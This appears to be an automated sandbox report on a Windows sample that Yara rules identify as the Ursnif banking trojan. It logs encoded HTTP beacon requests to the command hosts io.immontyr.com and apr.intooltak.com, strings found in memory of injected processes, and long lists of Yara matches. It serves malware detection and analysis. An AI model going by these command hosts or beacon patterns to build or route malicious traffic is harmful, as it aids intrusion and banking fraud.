                    Source: global trafficHTTP traffic detected: GET /6AgScewXArsM_2BFmRh/2pb60JsM3cYOiJQfoEqhxS/XBqVgQIYsRpEr/yoCXCgLf/y1qkoNRLcIv9gBJJquez8p4/tRkVMZ4drM/Xr6yguBScPI_2FHzu/H_2FvyhGemOv/8CbTsxfBhQ6/Wgqn5njZwuecNO/0ZUAF5iUC9u0FGPgne2Pd/hUjjD7f7srSH7qRy/yQbW_2BNcbmjwvz/43Z7l034Kd9pUEZYyD/lqXle_2Bn/M1jhi1NkfKtxF86Ts8rH/3AjxB9h8PcXSos9dSO_/2FUaQoaL5TEUFHzDcyiMsr/DzmpP5HI0X7E9/2_2BXGsb/Z46ybggq4jBb9mfE_2FUIJ0/VTd HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: io.immontyr.com
                    Source: global trafficHTTP traffic detected: POST /XXR4zdt7gL/c8rfa6di0aLY9fgZ7/eabelAedxPIp/icfexNsFKv6/MZ0OW72uAREGVI/IG_2FDcTxT0eyAWdMCKCF/JStGuje_2FFLrmQY/RzT3oqYbsvN_2B0/zPieMjusYDKgzk_2Fo/3zXAxuK0i/prSNBjQgYx6raC2a8Jwa/8N8dGY9X9RfbbN1Bv3p/owXAwWB7tQ6BLsyGDmeL4f/TkwXiqJh28A6z/I03OEFID/PW89wtlpyKFCUi1HmrshXBp/rGtQtZl4aR/9TSRaifJSVZfaHvcM/VXTHUZsAPl3x/FQELGTYQh89/NyrmkOg6psA2Qr/kXGGS9vg5NJjazC_2/B HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Content-Length: 2Host: io.immontyr.com
                    Source: Joe Sandbox ViewASN Name: SUPERSERVERSDATACENTERRU SUPERSERVERSDATACENTERRU
                    Source: lia.exe, 00000001.00000003.461398948.0000000003FB8000.00000004.00000040.sdmp, lia.exe, 00000001.00000003.461632840.0000000003FB8000.00000004.00000040.sdmp, control.exe, 00000012.00000003.482209524.000001D87239C000.00000004.00000040.sdmp, control.exe, 00000012.00000002.576309112.000001D87239C000.00000004.00000040.sdmp, control.exe, 00000012.00000003.565242259.000001D87239C000.00000004.00000040.sdmp, RuntimeBroker.exe, 00000021.00000002.887863520.0000021DB7F02000.00000004.00000001.sdmp, rundll32.exe, 00000022.00000002.574589889.00000215F4E3C000.00000004.00000040.sdmp, rundll32.exe, 00000022.00000003.572835965.00000215F4E3C000.00000004.00000040.sdmpString found in binary or memory: http://constitution.org/usdeclar.txt
                    Source: lia.exe, 00000001.00000003.461398948.0000000003FB8000.00000004.00000040.sdmp, lia.exe, 00000001.00000003.461632840.0000000003FB8000.00000004.00000040.sdmp, control.exe, 00000012.00000003.482209524.000001D87239C000.00000004.00000040.sdmp, control.exe, 00000012.00000002.576309112.000001D87239C000.00000004.00000040.sdmp, control.exe, 00000012.00000003.565242259.000001D87239C000.00000004.00000040.sdmp, RuntimeBroker.exe, 00000021.00000002.887863520.0000021DB7F02000.00000004.00000001.sdmp, rundll32.exe, 00000022.00000002.574589889.00000215F4E3C000.00000004.00000040.sdmp, rundll32.exe, 00000022.00000003.572835965.00000215F4E3C000.00000004.00000040.sdmpString found in binary or memory: http://constitution.org/usdeclar.txtC:
                    Source: powershell.exe, 0000000C.00000003.487223074.000001777B372000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                    Source: lia.exe, 00000001.00000003.461398948.0000000003FB8000.00000004.00000040.sdmp, lia.exe, 00000001.00000003.461632840.0000000003FB8000.00000004.00000040.sdmp, control.exe, 00000012.00000003.482209524.000001D87239C000.00000004.00000040.sdmp, control.exe, 00000012.00000002.576309112.000001D87239C000.00000004.00000040.sdmp, control.exe, 00000012.00000003.565242259.000001D87239C000.00000004.00000040.sdmp, RuntimeBroker.exe, 00000021.00000002.887863520.0000021DB7F02000.00000004.00000001.sdmp, rundll32.exe, 00000022.00000002.574589889.00000215F4E3C000.00000004.00000040.sdmp, rundll32.exe, 00000022.00000003.572835965.00000215F4E3C000.00000004.00000040.sdmpString found in binary or memory: http://https://file://USER.ID%lu.exe/upd
                    Source: RuntimeBroker.exe, 00000024.00000000.646611308.0000021910AF6000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000024.00000000.640875503.0000021910AF6000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000024.00000002.884581064.0000021910AF6000.00000004.00000001.sdmpString found in binary or memory: http://ns.adobe.cmg
                    Source: RuntimeBroker.exe, 00000024.00000000.646611308.0000021910AF6000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000024.00000000.640875503.0000021910AF6000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000024.00000002.884581064.0000021910AF6000.00000004.00000001.sdmpString found in binary or memory: http://ns.adobp/
                    Source: powershell.exe, 0000000C.00000002.621215715.0000017710062000.00000004.00000001.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                    Source: powershell.exe, 0000000C.00000002.573337997.0000017700210000.00000004.00000001.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                    Source: powershell.exe, 0000000C.00000002.572331191.0000017700001000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: RuntimeBroker.exe, 00000024.00000000.640770268.0000021910A80000.00000004.00000001.sdmpString found in binary or memory: http://twitter.com/spotifyg
                    Source: powershell.exe, 0000000C.00000002.573337997.0000017700210000.00000004.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                    Source: explorer.exe, 00000016.00000000.543937069.000000000095C000.00000004.00000020.sdmp, explorer.exe, 00000016.00000000.495631696.000000000095C000.00000004.00000020.sdmp, explorer.exe, 00000016.00000000.527688751.000000000095C000.00000004.00000020.sdmp, explorer.exe, 00000016.00000000.521348094.000000000095C000.00000004.00000020.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
                    Source: powershell.exe, 0000000C.00000002.621215715.0000017710062000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/
                    Source: powershell.exe, 0000000C.00000002.621215715.0000017710062000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/Icon
                    Source: powershell.exe, 0000000C.00000002.621215715.0000017710062000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/License
                    Source: powershell.exe, 0000000C.00000002.573337997.0000017700210000.00000004.00000001.sdmpString found in binary or memory: https://github.com/Pester/Pester
                    Source: powershell.exe, 0000000C.00000002.621215715.0000017710062000.00000004.00000001.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                    Source: unknownDNS traffic detected: queries for: apr.intooltak.com
                    Source: global trafficHTTP traffic detected: GET /Wg8ZotKLB67wfW5SwZqGSw/B6Pr8y6FSG7qE/dhgVBQ5f/qYV4zjBmW0p8TlaGQybQbuc/zPwZtYg0qe/YvqcBHXsIQLHqbH94/d_2BupZQQiTi/5Byc1fDGrMO/bSgpr9iTEwo25G/CeL9CYyO93o0dqulKxymb/hEpJXCOVCSN3Pmxe/q0xcJ_2FmJa4D27/U1246rlDM2agQvjv3h/WRbjABFUG/gI4Eitywfd5lZ23J3vVr/JPI_2B23mvnMwPmRO6K/YashCAds7tANuDYeB6xIHB/drGSloPvvfGJt/OBQ_2BHz/QyFEKNyGLRcMCqk/I HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:95.0) Gecko/20100101 Firefox/95.0Host: apr.intooltak.com
                    Source: global trafficHTTP traffic detected: GET /GUlBnqEqcwtrn48_2/BE1EqzAvLejt/cb_2BaCRrwf/fWZBg8h5a62TXa/ZijwGrOQXflAgqbaDl7vf/RWmm1wdfmEqQ53O8/wCfIuBFFTvny4Ty/wNnD_2FEBKrFWj66al/3Xji0up_2/BgYV45jLknd5oCK8kb3h/IMSPqceHWV7drpxnmfQ/DvisvgmR_2F11ZikfA2avm/yQQyOWRIC9HrG/_2Fskrj5/9o_2BraWvUUtS0KRGaPskJs/8YiMjMPZvb/QZXl3C1FFIFMxJSHp/vq0A22YW_2B0/ynWnVX3jCla/hCIZQggWpcdryd/2P_2FL1_2BMBiXUGiQteI/jG_2BPlE/MfOjEqY7X/Fc HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:95.0) Gecko/20100101 Firefox/95.0Host: apr.intooltak.com
                    Source: global trafficHTTP traffic detected: GET /h_2BwNYezNkzTOCsdNbfn/ryja45eec93vXnRl/PLAH_2FQyM6jDyy/KJNIgaRFr9YvYl3hMq/ZhUn0_2BE/c6mccVrcWOAEGEovJjKg/7hXIYQcexZwU5itqfu4/vIseK0jkOuaXTGkc9nGx8s/NOa1JoKkXMAzc/6TzPbRle/G6gck37gRv7BYdFnxt_2F8j/9egvDbXEUD/ENj4iL_2FV2ZRlnx_/2FW6jH0jr8uj/hM6FvZP7xEB/_2FC54ka1xMZn_/2BjzmgrQuKHtOl7aIEkp_/2Fz7UYVuMXPvSkQj/otv3Y28C6cQXgp2/IlTPgKIH6YdiOogryV/u3aMiVshcBzajZXX8/BR9 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:95.0) Gecko/20100101 Firefox/95.0Host: apr.intooltak.com
                    Source: global trafficHTTP traffic detected: GET /6AgScewXArsM_2BFmRh/2pb60JsM3cYOiJQfoEqhxS/XBqVgQIYsRpEr/yoCXCgLf/y1qkoNRLcIv9gBJJquez8p4/tRkVMZ4drM/Xr6yguBScPI_2FHzu/H_2FvyhGemOv/8CbTsxfBhQ6/Wgqn5njZwuecNO/0ZUAF5iUC9u0FGPgne2Pd/hUjjD7f7srSH7qRy/yQbW_2BNcbmjwvz/43Z7l034Kd9pUEZYyD/lqXle_2Bn/M1jhi1NkfKtxF86Ts8rH/3AjxB9h8PcXSos9dSO_/2FUaQoaL5TEUFHzDcyiMsr/DzmpP5HI0X7E9/2_2BXGsb/Z46ybggq4jBb9mfE_2FUIJ0/VTd HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: io.immontyr.com
                    Source: RuntimeBroker.exe, 00000024.00000000.640770268.0000021910A80000.00000004.00000001.sdmpString found in binary or memory: n Facebook: http://www.facebook.com/spotify equals www.facebook.com (Facebook)
                    Source: unknownHTTP traffic detected: POST /XXR4zdt7gL/c8rfa6di0aLY9fgZ7/eabelAedxPIp/icfexNsFKv6/MZ0OW72uAREGVI/IG_2FDcTxT0eyAWdMCKCF/JStGuje_2FFLrmQY/RzT3oqYbsvN_2B0/zPieMjusYDKgzk_2Fo/3zXAxuK0i/prSNBjQgYx6raC2a8Jwa/8N8dGY9X9RfbbN1Bv3p/owXAwWB7tQ6BLsyGDmeL4f/TkwXiqJh28A6z/I03OEFID/PW89wtlpyKFCUi1HmrshXBp/rGtQtZl4aR/9TSRaifJSVZfaHvcM/VXTHUZsAPl3x/FQELGTYQh89/NyrmkOg6psA2Qr/kXGGS9vg5NJjazC_2/B HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Content-Length: 2Host: io.immontyr.com

                    Key, Mouse, Clipboard, Microphone and Screen Capturing:

                    barindex
                    Yara detected UrsnifShow sources
                    Source: Yara matchFile source: 00000001.00000003.461398948.0000000003FB8000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000002C.00000003.735246636.0000000003C28000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000003.461598974.0000000003FB8000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000021.00000002.887863520.0000021DB7F02000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000002C.00000003.735331530.0000000003C28000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000002C.00000002.736669788.0000000003C28000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000002C.00000003.735275248.0000000003C28000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000003.461428339.0000000003FB8000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000003.402373531.0000000003058000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000003.402396026.0000000003058000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000003.402348722.0000000003058000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000003.402294438.0000000003058000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000002C.00000003.735063970.0000000003C28000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000029.00000002.885623791.000002DACE802000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000003.402422908.0000000003058000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000012.00000003.482209524.000001D87239C000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000003.461632840.0000000003FB8000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000012.00000002.576309112.000001D87239C000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000022.00000002.574589889.00000215F4E3C000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000022.00000003.572835965.00000215F4E3C000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000003.402435422.0000000003058000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000002B.00000002.758280009.0000026E98402000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000012.00000003.482360612.000001D87239C000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000003.409196804.0000000002E5C000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000003.461516298.0000000003FB8000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000003.461458539.0000000003FB8000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000002C.00000003.735014776.0000000003C28000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000002C.00000003.735217272.0000000003C28000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000012.00000003.482275696.000001D87239C000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000002C.00000003.734959693.0000000003C28000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000003.461491629.0000000003FB8000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000012.00000003.565242259.000001D87239C000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000003.402320891.0000000003058000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000002C.00000003.735178288.0000000003C28000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000003.404803745.0000000003058000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000002C.00000003.735119734.0000000003C28000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000003.402410864.0000000003058000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000003.461577321.0000000003FB8000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000012.00000003.482336864.000001D87239C000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000003.461546582.0000000003FB8000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000022.00000003.572684942.00000215F4E3C000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000022.00000003.572753584.00000215F4E3C000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000024.00000002.890361063.0000021913402000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000022.00000003.572871449.00000215F4E3C000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: lia.exe PID: 7036, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: control.exe PID: 6004, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: RuntimeBroker.exe PID: 3092, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 5360, type: MEMORYSTR
                    Source: Yara matchFile source: 1.3.lia.exe.3008f40.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.3.lia.exe.2f5a4a0.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.3.lia.exe.2f5a4a0.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.3.lia.exe.2fd94a0.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000012.00000000.476711224.0000000000520000.00000040.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000024.00000000.642047864.0000021913010000.00000040.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000029.00000000.680268129.000002DACE370000.00000040.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000012.00000000.480249621.0000000000520000.00000040.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000029.00000000.672890506.000002DACE370000.00000040.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000012.00000000.478021133.0000000000520000.00000040.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000021.00000000.585135528.0000021DB8A00000.00000040.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000C.00000002.622062624.00000177102EB000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000022.00000000.571073263.00000215F47E0000.00000040.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000029.00000000.668952654.000002DACE370000.00000040.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000002.528427153.0000000002CDF000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000024.00000000.648717735.0000021913010000.00000040.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000029.00000002.884777631.000002DACE371000.00000020.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000002B.00000000.721648561.0000026E98100000.00000040.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000003.407010476.0000000002F5A000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000021.00000002.889460843.0000021DB8A01000.00000020.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000024.00000000.632217851.0000021913010000.00000040.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000002B.00000000.715754515.0000026E98100000.00000040.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000022.00000000.569407993.00000215F47E0000.00000040.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000002B.00000000.709079210.0000026E98100000.00000040.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000022.00000000.567877818.00000215F47E0000.00000040.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000024.00000002.889547397.0000021913011000.00000020.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000012.00000002.573725665.0000000000521000.00000020.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000003.407052672.0000000002FD9000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000002B.00000002.757780721.0000026E98101000.00000020.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000021.00000000.598890734.0000021DB8A00000.00000040.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000021.00000000.590438554.0000021DB8A00000.00000040.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000022.00000002.574044553.00000215F47E1000.00000020.00020000.sdmp, type: MEMORY

                    E-Banking Fraud:

                    barindex
                    Yara detected UrsnifShow sources
                    <
                    Source: Yara matchFile source: 00000001.00000003.461398948.0000000003FB8000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000002C.00000003.735246636.0000000003C28000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000003.461598974.0000000003FB8000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000021.00000002.887863520.0000021DB7F02000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000002C.00000003.735331530.0000000003C28000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000002C.00000002.736669788.0000000003C28000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000002C.00000003.735275248.0000000003C28000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000003.461428339.0000000003FB8000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000003.402373531.0000000003058000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000003.402396026.0000000003058000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000003.402348722.0000000003058000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000003.402294438.0000000003058000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000002C.00000003.735063970.0000000003C28000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000029.00000002.885623791.000002DACE802000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000003.402422908.0000000003058000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000012.00000003.482209524.000001D87239C000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000003.461632840.0000000003FB8000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000012.00000002.576309112.000001D87239C000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000022.00000002.574589889.00000215F4E3C000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000022.00000003.572835965.00000215F4E3C000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000003.402435422.0000000003058000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000002B.00000002.758280009.0000026E98402000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000012.00000003.482360612.000001D87239C000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000003.409196804.0000000002E5C000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000003.461516298.0000000003FB8000.00000004.00000040.sdmp, type: MEMORY